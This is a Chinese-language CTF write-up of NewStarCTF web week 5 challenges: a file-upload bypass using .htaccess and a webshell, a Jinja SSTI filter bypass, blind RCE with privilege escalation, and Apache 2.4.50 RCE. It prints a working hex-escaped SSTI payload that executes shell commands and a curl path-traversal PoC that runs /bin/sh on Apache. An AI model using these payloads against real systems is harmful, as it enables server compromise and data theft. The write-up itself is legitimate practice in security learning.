newstarctf web week5

 Give me your photo PLZ

这是一道基本的文件上传类型的题，直接先用一句话木马试试。 

 应该是后缀PHP被过滤了，用phtml试试。

一样的结果。

然后用图片码试试。

 上传成功。打开bp看看。

 试试改改后缀，发现不行，然后就用.htaccess上传。

 

上传成功。

 

 这种情况就是成功了 ，然后直接用蚁剑来连。

 

成功拿到flag。

除了.htaccess以外，还有.user.ini    这道题我没试过，不知道能不能解。

BabySSTI_Three

 老样子  先拿上周的pload试一下  看能不能打通。

{{''['\x5f\x5fcl\x61ss\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubcl\x61sses\x5f\x5f']()[117]['\x5f\x5fin\x69t\x5f\x5f']['\x5f\x5fglob\x61ls\x5f\x5f']['pop\x65n']('ls /')['read']()}}

发现没打通   检查一下  看到base还没变为16进制，就猜猜是不是base的问题。

http://b174b7a3-1244-4efc-a211-22109b5ea096.node4.buuoj.cn:81/?name={{''['\x5f\x5fcl\x61ss\x5f\x5f']['\x5f\x5fb\x61se\x5f\x5f']['\x5f\x5fsubcl\x61sses\x5f\x5f']()[117]['\x5f\x5fin\x69t\x5f\x5f']['\x5f\x5fglob\x61ls\x5f\x5f']['pop\x65n']('ls /')['read']()}}

然后发现还不行   就检查是不是空格  ls  /的问题。

修改了一下，发现成功了， 就开始读flag。

尝试了一遍  不知道为什么没看到  就找了一些可以替代cat的命令来执行。

 利用了  more就试出来了。

So Baby RCE Again

这个题与上个rce的题的差别在用了shell_exec,百度了一下，是无回显的一个命令执行函数，然后就根据了这个博客

(1条消息) [CTF]命令执行无回显利用_Snakin_ya的博客-CSDN博客_命令执行无回显

来学习，就先尝试了一下反弹shell，发现没有监听没有东西出来，就找别的方法了。

然后根据这个博客  (1条消息) ctf 监听端口_浅谈ctf中的无回显_出圈唇享的博客-CSDN博客  

来学习，尝试了一下写入一句话木马，并用蚁剑连接。

找到flag.然后点进去啥也没有，但大小却不为零。然后尝试打开蚁剑终端，用cat试了一下。

提示没有权限，然后就去学习了如何提权。

linux提权方法(不断总结更新) - 冬泳怪鸽 - 博客园 (cnblogs.com)用这个博客来学习了一下。

找到了可用函数，如何就一个个试，但mount 和umount试了一下发现没用，就用了date函数。

 最后拿到flag;

之前利用了网上一些提权的方法  sudo chomd 啥的  蚁剑都不给用 。还尝试过一个把￥变成#也不管用。。。。。。。。。

Unsafe Apache

 刚开始拿到题的时候，根本看不懂这是什么类型的题目，于是就在Google查，就查到了这是个web服务器类型  apache漏洞的题。

然后根据这个工具，发现了这是apache2.4.50的漏洞。

然后根据这个博客

 null原文始发于微信公众号（渗透Xiao白帽）：【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现https://cn-sec.com/archives/584760.html根据里面给的poc,直接用就可以拿到flag了

 

 poc:

curl --data "echo;cat /f*" 'http://node4.buuoj.cn:27648/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh'

 Final round

这个没解出来。。。。